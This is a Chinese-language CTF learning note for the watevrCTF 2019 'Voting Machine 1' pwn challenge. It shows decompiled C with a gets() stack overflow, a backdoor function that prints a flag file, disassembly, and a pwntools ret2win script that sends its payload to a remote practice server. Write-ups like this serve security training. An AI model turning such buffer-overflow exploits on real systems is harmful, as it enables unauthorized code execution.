[watevrCTF 2019]Voting Machine 1

第一次打CTF——PWN篇学习笔记12

int __fastcall main(int argc, const char **argv, const char **envp) { _BYTE v4[2]; // [rsp+Eh] [rbp-2h] BYREF ​ signal(14, sig); alarm(0x28u); puts("Hello and welcome to \x1B[3mour\x1B[23m voting application!"); puts("Today's vote will be regarding the administration of"); puts("watevr CTF."); puts("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible."); puts("Thanks!"); printf("Vote: "); fflush(_bss_start); gets(v4); puts("Thanks for voting!"); return 0; }

发现gets函数，明显的栈溢出，查看字符串发现/home/ctf/flag.txt，点击进入后门函数

void __noreturn super_secret_function() { FILE *stream; // [rsp+0h] [rbp-10h] char i; // [rsp+Fh] [rbp-1h] ​ stream = fopen("/home/ctf/flag.txt", "r"); if ( !stream ) { puts("Cannot open flag.txt"); exit(1); } for ( i = fgetc(stream); i != -1; i = fgetc(stream) ) putchar(i); fclose(stream); exit(0); }

.text:0000000000400807 super_secret_function proc near .text:0000000000400807 .text:0000000000400807 stream = qword ptr -10h .text:0000000000400807 var_1 = byte ptr -1 .text:0000000000400807 .text:0000000000400807 ; __unwind { .text:0000000000400807 push rbp .text:0000000000400808 mov rbp, rsp .text:000000000040080B sub rsp, 10h .text:000000000040080F lea rsi, modes ; "r" .text:0000000000400816 lea rdi, filename ; "/home/ctf/flag.txt" .text:000000000040081D call _fopen .text:0000000000400822 mov [rbp+stream], rax .text:0000000000400826 cmp [rbp+stream], 0 .text:000000000040082B jnz short loc_400843 .text:000000000040082D lea rdi, s ; "Cannot open flag.txt" .text:0000000000400834 call _puts .text:0000000000400839 mov edi, 1 ; status .text:000000000040083E call _exit

取地址0x400808，据此编写脚本，成功获得flag

from pwn import * import struct ​ context.arch = 'amd64' context.os = 'linux' ​ #io = process('./pwn') io = remote("node5.anna.nssctf.cn",21930) ​ backdoor = 0x400808 ​ payload = cyclic(0x2 + 8) + p64(backdoor) ​ io.sendline(payload) ​ io.interactive()